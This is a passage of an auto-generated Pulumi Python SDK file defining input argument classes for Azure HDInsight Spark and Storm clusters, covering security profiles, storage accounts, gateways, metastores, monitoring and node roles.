:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Zookeeper Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Zookeeper Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class SparkClusterSecurityProfileArgs:
def __init__(__self__, *,
aadds_resource_id: pulumi.Input[str],
domain_name: pulumi.Input[str],
domain_user_password: pulumi.Input[str],
domain_username: pulumi.Input[str],
ldaps_urls: pulumi.Input[Sequence[pulumi.Input[str]]],
msi_resource_id: pulumi.Input[str],
cluster_users_group_dns: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None):
"""
:param pulumi.Input[str] aadds_resource_id: The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_name: The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_user_password: The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[str] domain_username: The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ldaps_urls: A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
:param pulumi.Input[str] msi_resource_id: The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] cluster_users_group_dns: A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "aadds_resource_id", aadds_resource_id)
pulumi.set(__self__, "domain_name", domain_name)
pulumi.set(__self__, "domain_user_password", domain_user_password)
pulumi.set(__self__, "domain_username", domain_username)
pulumi.set(__self__, "ldaps_urls", ldaps_urls)
pulumi.set(__self__, "msi_resource_id", msi_resource_id)
if cluster_users_group_dns is not None:
pulumi.set(__self__, "cluster_users_group_dns", cluster_users_group_dns)
@property
@pulumi.getter(name="aaddsResourceId")
def aadds_resource_id(self) -> pulumi.Input[str]:
"""
The resource ID of the Azure Active Directory Domain Service. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "aadds_resource_id")
@aadds_resource_id.setter
def aadds_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "aadds_resource_id", value)
@property
@pulumi.getter(name="domainName")
def domain_name(self) -> pulumi.Input[str]:
"""
The name of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_name")
@domain_name.setter
def domain_name(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_name", value)
@property
@pulumi.getter(name="domainUserPassword")
def domain_user_password(self) -> pulumi.Input[str]:
"""
The user password of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_user_password")
@domain_user_password.setter
def domain_user_password(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_user_password", value)
@property
@pulumi.getter(name="domainUsername")
def domain_username(self) -> pulumi.Input[str]:
"""
The username of the Azure Active Directory Domain. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "domain_username")
@domain_username.setter
def domain_username(self, value: pulumi.Input[str]):
pulumi.set(self, "domain_username", value)
@property
@pulumi.getter(name="ldapsUrls")
def ldaps_urls(self) -> pulumi.Input[Sequence[pulumi.Input[str]]]:
"""
A list of the LDAPS URLs to communicate with the Azure Active Directory. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ldaps_urls")
@ldaps_urls.setter
def ldaps_urls(self, value: pulumi.Input[Sequence[pulumi.Input[str]]]):
pulumi.set(self, "ldaps_urls", value)
@property
@pulumi.getter(name="msiResourceId")
def msi_resource_id(self) -> pulumi.Input[str]:
"""
The User Assigned Identity for the HDInsight Cluster. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "msi_resource_id")
@msi_resource_id.setter
def msi_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "msi_resource_id", value)
@property
@pulumi.getter(name="clusterUsersGroupDns")
def cluster_users_group_dns(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of the distinguished names for the cluster user groups. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "cluster_users_group_dns")
@cluster_users_group_dns.setter
def cluster_users_group_dns(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "cluster_users_group_dns", value)
@pulumi.input_type
class SparkClusterStorageAccountArgs:
def __init__(__self__, *,
is_default: pulumi.Input[bool],
storage_account_key: pulumi.Input[str],
storage_container_id: pulumi.Input[str]):
"""
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_account_key: The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_container_id: The ID of the Storage Container. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "storage_account_key", storage_account_key)
pulumi.set(__self__, "storage_container_id", storage_container_id)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="storageAccountKey")
def storage_account_key(self) -> pulumi.Input[str]:
"""
The Access Key which should be used to connect to the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_account_key")
@storage_account_key.setter
def storage_account_key(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_account_key", value)
@property
@pulumi.getter(name="storageContainerId")
def storage_container_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Container. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_container_id")
@storage_container_id.setter
def storage_container_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_container_id", value)
@pulumi.input_type
class SparkClusterStorageAccountGen2Args:
def __init__(__self__, *,
filesystem_id: pulumi.Input[str],
is_default: pulumi.Input[bool],
managed_identity_resource_id: pulumi.Input[str],
storage_resource_id: pulumi.Input[str]):
"""
:param pulumi.Input[str] filesystem_id: The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
:param pulumi.Input[bool] is_default: Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
:param pulumi.Input[str] managed_identity_resource_id: The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
:param pulumi.Input[str] storage_resource_id: The ID of the Storage Account. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "filesystem_id", filesystem_id)
pulumi.set(__self__, "is_default", is_default)
pulumi.set(__self__, "managed_identity_resource_id", managed_identity_resource_id)
pulumi.set(__self__, "storage_resource_id", storage_resource_id)
@property
@pulumi.getter(name="filesystemId")
def filesystem_id(self) -> pulumi.Input[str]:
"""
The ID of the Gen2 Filesystem. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "filesystem_id")
@filesystem_id.setter
def filesystem_id(self, value: pulumi.Input[str]):
pulumi.set(self, "filesystem_id", value)
@property
@pulumi.getter(name="isDefault")
def is_default(self) -> pulumi.Input[bool]:
"""
Is this the Default Storage Account for the HDInsight Hadoop Cluster? Changing this forces a new resource to be created.
"""
return pulumi.get(self, "is_default")
@is_default.setter
def is_default(self, value: pulumi.Input[bool]):
pulumi.set(self, "is_default", value)
@property
@pulumi.getter(name="managedIdentityResourceId")
def managed_identity_resource_id(self) -> pulumi.Input[str]:
"""
The ID of Managed Identity to use for accessing the Gen2 filesystem. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "managed_identity_resource_id")
@managed_identity_resource_id.setter
def managed_identity_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "managed_identity_resource_id", value)
@property
@pulumi.getter(name="storageResourceId")
def storage_resource_id(self) -> pulumi.Input[str]:
"""
The ID of the Storage Account. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storage_resource_id")
@storage_resource_id.setter
def storage_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "storage_resource_id", value)
@pulumi.input_type
class StormClusterComponentVersionArgs:
def __init__(__self__, *,
storm: pulumi.Input[str]):
"""
:param pulumi.Input[str] storm: The version of Storm which should be used for this HDInsight Storm Cluster. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "storm", storm)
@property
@pulumi.getter
def storm(self) -> pulumi.Input[str]:
"""
The version of Storm which should be used for this HDInsight Storm Cluster. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "storm")
@storm.setter
def storm(self, value: pulumi.Input[str]):
pulumi.set(self, "storm", value)
@pulumi.input_type
class StormClusterGatewayArgs:
def __init__(__self__, *,
password: pulumi.Input[str],
username: pulumi.Input[str],
enabled: Optional[pulumi.Input[bool]] = None):
"""
:param pulumi.Input[str] password: The password used for the Ambari Portal.
:param pulumi.Input[str] username: The username used for the Ambari Portal. Changing this forces a new resource to be created.
:param pulumi.Input[bool] enabled: Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "username", username)
if enabled is not None:
warnings.warn("""HDInsight doesn't support disabling gateway anymore""", DeprecationWarning)
pulumi.log.warn("""enabled is deprecated: HDInsight doesn't support disabling gateway anymore""")
if enabled is not None:
pulumi.set(__self__, "enabled", enabled)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The password used for the Ambari Portal.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The username used for the Ambari Portal. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter
def enabled(self) -> Optional[pulumi.Input[bool]]:
"""
Is the Ambari portal enabled? The HDInsight API doesn't support disabling gateway anymore.
"""
return pulumi.get(self, "enabled")
@enabled.setter
def enabled(self, value: Optional[pulumi.Input[bool]]):
pulumi.set(self, "enabled", value)
@pulumi.input_type
class StormClusterMetastoresArgs:
def __init__(__self__, *,
ambari: Optional[pulumi.Input['StormClusterMetastoresAmbariArgs']] = None,
hive: Optional[pulumi.Input['StormClusterMetastoresHiveArgs']] = None,
oozie: Optional[pulumi.Input['StormClusterMetastoresOozieArgs']] = None):
"""
:param pulumi.Input['StormClusterMetastoresAmbariArgs'] ambari: An `ambari` block as defined below.
:param pulumi.Input['StormClusterMetastoresHiveArgs'] hive: A `hive` block as defined below.
:param pulumi.Input['StormClusterMetastoresOozieArgs'] oozie: An `oozie` block as defined below.
"""
if ambari is not None:
pulumi.set(__self__, "ambari", ambari)
if hive is not None:
pulumi.set(__self__, "hive", hive)
if oozie is not None:
pulumi.set(__self__, "oozie", oozie)
@property
@pulumi.getter
def ambari(self) -> Optional[pulumi.Input['StormClusterMetastoresAmbariArgs']]:
"""
An `ambari` block as defined below.
"""
return pulumi.get(self, "ambari")
@ambari.setter
def ambari(self, value: Optional[pulumi.Input['StormClusterMetastoresAmbariArgs']]):
pulumi.set(self, "ambari", value)
@property
@pulumi.getter
def hive(self) -> Optional[pulumi.Input['StormClusterMetastoresHiveArgs']]:
"""
A `hive` block as defined below.
"""
return pulumi.get(self, "hive")
@hive.setter
def hive(self, value: Optional[pulumi.Input['StormClusterMetastoresHiveArgs']]):
pulumi.set(self, "hive", value)
@property
@pulumi.getter
def oozie(self) -> Optional[pulumi.Input['StormClusterMetastoresOozieArgs']]:
"""
An `oozie` block as defined below.
"""
return pulumi.get(self, "oozie")
@oozie.setter
def oozie(self, value: Optional[pulumi.Input['StormClusterMetastoresOozieArgs']]):
pulumi.set(self, "oozie", value)
@pulumi.input_type
class StormClusterMetastoresAmbariArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Ambari metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Ambari metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class StormClusterMetastoresHiveArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Hive metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Hive metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class StormClusterMetastoresOozieArgs:
def __init__(__self__, *,
database_name: pulumi.Input[str],
password: pulumi.Input[str],
server: pulumi.Input[str],
username: pulumi.Input[str]):
"""
:param pulumi.Input[str] database_name: The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
:param pulumi.Input[str] server: The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
:param pulumi.Input[str] username: The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "database_name", database_name)
pulumi.set(__self__, "password", password)
pulumi.set(__self__, "server", server)
pulumi.set(__self__, "username", username)
@property
@pulumi.getter(name="databaseName")
def database_name(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL database. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "database_name")
@database_name.setter
def database_name(self, value: pulumi.Input[str]):
pulumi.set(self, "database_name", value)
@property
@pulumi.getter
def password(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin password. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: pulumi.Input[str]):
pulumi.set(self, "password", value)
@property
@pulumi.getter
def server(self) -> pulumi.Input[str]:
"""
The fully-qualified domain name (FQDN) of the SQL server to use for the external Oozie metastore. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "server")
@server.setter
def server(self, value: pulumi.Input[str]):
pulumi.set(self, "server", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The external Oozie metastore's existing SQL server admin username. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@pulumi.input_type
class StormClusterMonitorArgs:
def __init__(__self__, *,
log_analytics_workspace_id: pulumi.Input[str],
primary_key: pulumi.Input[str]):
"""
:param pulumi.Input[str] log_analytics_workspace_id: The Operations Management Suite (OMS) workspace ID.
:param pulumi.Input[str] primary_key: The Operations Management Suite (OMS) workspace key.
"""
pulumi.set(__self__, "log_analytics_workspace_id", log_analytics_workspace_id)
pulumi.set(__self__, "primary_key", primary_key)
@property
@pulumi.getter(name="logAnalyticsWorkspaceId")
def log_analytics_workspace_id(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace ID.
"""
return pulumi.get(self, "log_analytics_workspace_id")
@log_analytics_workspace_id.setter
def log_analytics_workspace_id(self, value: pulumi.Input[str]):
pulumi.set(self, "log_analytics_workspace_id", value)
@property
@pulumi.getter(name="primaryKey")
def primary_key(self) -> pulumi.Input[str]:
"""
The Operations Management Suite (OMS) workspace key.
"""
return pulumi.get(self, "primary_key")
@primary_key.setter
def primary_key(self, value: pulumi.Input[str]):
pulumi.set(self, "primary_key", value)
@pulumi.input_type
class StormClusterRolesArgs:
def __init__(__self__, *,
head_node: pulumi.Input['StormClusterRolesHeadNodeArgs'],
worker_node: pulumi.Input['StormClusterRolesWorkerNodeArgs'],
zookeeper_node: pulumi.Input['StormClusterRolesZookeeperNodeArgs']):
"""
:param pulumi.Input['StormClusterRolesHeadNodeArgs'] head_node: A `head_node` block as defined above.
:param pulumi.Input['StormClusterRolesWorkerNodeArgs'] worker_node: A `worker_node` block as defined below.
:param pulumi.Input['StormClusterRolesZookeeperNodeArgs'] zookeeper_node: A `zookeeper_node` block as defined below.
"""
pulumi.set(__self__, "head_node", head_node)
pulumi.set(__self__, "worker_node", worker_node)
pulumi.set(__self__, "zookeeper_node", zookeeper_node)
@property
@pulumi.getter(name="headNode")
def head_node(self) -> pulumi.Input['StormClusterRolesHeadNodeArgs']:
"""
A `head_node` block as defined above.
"""
return pulumi.get(self, "head_node")
@head_node.setter
def head_node(self, value: pulumi.Input['StormClusterRolesHeadNodeArgs']):
pulumi.set(self, "head_node", value)
@property
@pulumi.getter(name="workerNode")
def worker_node(self) -> pulumi.Input['StormClusterRolesWorkerNodeArgs']:
"""
A `worker_node` block as defined below.
"""
return pulumi.get(self, "worker_node")
@worker_node.setter
def worker_node(self, value: pulumi.Input['StormClusterRolesWorkerNodeArgs']):
pulumi.set(self, "worker_node", value)
@property
@pulumi.getter(name="zookeeperNode")
def zookeeper_node(self) -> pulumi.Input['StormClusterRolesZookeeperNodeArgs']:
"""
A `zookeeper_node` block as defined below.
"""
return pulumi.get(self, "zookeeper_node")
@zookeeper_node.setter
def zookeeper_node(self, value: pulumi.Input['StormClusterRolesZookeeperNodeArgs']):
pulumi.set(self, "zookeeper_node", value)
@pulumi.input_type
class StormClusterRolesHeadNodeArgs:
def __init__(__self__, *,
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[str] username: The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Head Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Subnet within the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "subnet_id")
@subnet_id.setter
def subnet_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "subnet_id", value)
@property
@pulumi.getter(name="virtualNetworkId")
def virtual_network_id(self) -> Optional[pulumi.Input[str]]:
"""
The ID of the Virtual Network where the Head Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "virtual_network_id")
@virtual_network_id.setter
def virtual_network_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "virtual_network_id", value)
@pulumi.input_type
class StormClusterRolesWorkerNodeArgs:
def __init__(__self__, *,
target_instance_count: pulumi.Input[int],
username: pulumi.Input[str],
vm_size: pulumi.Input[str],
min_instance_count: Optional[pulumi.Input[int]] = None,
password: Optional[pulumi.Input[str]] = None,
ssh_keys: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
subnet_id: Optional[pulumi.Input[str]] = None,
virtual_network_id: Optional[pulumi.Input[str]] = None):
"""
:param pulumi.Input[int] target_instance_count: The number of instances which should be run for the Worker Nodes.
:param pulumi.Input[str] username: The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] vm_size: The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[int] min_instance_count: The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] password: The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[Sequence[pulumi.Input[str]]] ssh_keys: A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
:param pulumi.Input[str] subnet_id: The ID of the Subnet within the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
:param pulumi.Input[str] virtual_network_id: The ID of the Virtual Network where the Worker Nodes should be provisioned within. Changing this forces a new resource to be created.
"""
pulumi.set(__self__, "target_instance_count", target_instance_count)
pulumi.set(__self__, "username", username)
pulumi.set(__self__, "vm_size", vm_size)
if min_instance_count is not None:
warnings.warn("""this has been deprecated from the API and will be removed in version 3.0 of the provider""", DeprecationWarning)
pulumi.log.warn("""min_instance_count is deprecated: this has been deprecated from the API and will be removed in version 3.0 of the provider""")
if min_instance_count is not None:
pulumi.set(__self__, "min_instance_count", min_instance_count)
if password is not None:
pulumi.set(__self__, "password", password)
if ssh_keys is not None:
pulumi.set(__self__, "ssh_keys", ssh_keys)
if subnet_id is not None:
pulumi.set(__self__, "subnet_id", subnet_id)
if virtual_network_id is not None:
pulumi.set(__self__, "virtual_network_id", virtual_network_id)
@property
@pulumi.getter(name="targetInstanceCount")
def target_instance_count(self) -> pulumi.Input[int]:
"""
The number of instances which should be run for the Worker Nodes.
"""
return pulumi.get(self, "target_instance_count")
@target_instance_count.setter
def target_instance_count(self, value: pulumi.Input[int]):
pulumi.set(self, "target_instance_count", value)
@property
@pulumi.getter
def username(self) -> pulumi.Input[str]:
"""
The Username of the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "username")
@username.setter
def username(self, value: pulumi.Input[str]):
pulumi.set(self, "username", value)
@property
@pulumi.getter(name="vmSize")
def vm_size(self) -> pulumi.Input[str]:
"""
The Size of the Virtual Machine which should be used as the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "vm_size")
@vm_size.setter
def vm_size(self, value: pulumi.Input[str]):
pulumi.set(self, "vm_size", value)
@property
@pulumi.getter(name="minInstanceCount")
def min_instance_count(self) -> Optional[pulumi.Input[int]]:
"""
The minimum number of instances which should be run for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "min_instance_count")
@min_instance_count.setter
def min_instance_count(self, value: Optional[pulumi.Input[int]]):
pulumi.set(self, "min_instance_count", value)
@property
@pulumi.getter
def password(self) -> Optional[pulumi.Input[str]]:
"""
The Password associated with the local administrator for the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "password")
@password.setter
def password(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "password", value)
@property
@pulumi.getter(name="sshKeys")
def ssh_keys(self) -> Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]:
"""
A list of SSH Keys which should be used for the local administrator on the Worker Nodes. Changing this forces a new resource to be created.
"""
return pulumi.get(self, "ssh_keys")
@ssh_keys.setter
def ssh_keys(self, value: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]]):
pulumi.set(self, "ssh_keys", value)
@property
@pulumi.getter(name="subnetId")
def subnet_id(self) -> Optional[pulumi.Input[str]]:
"""
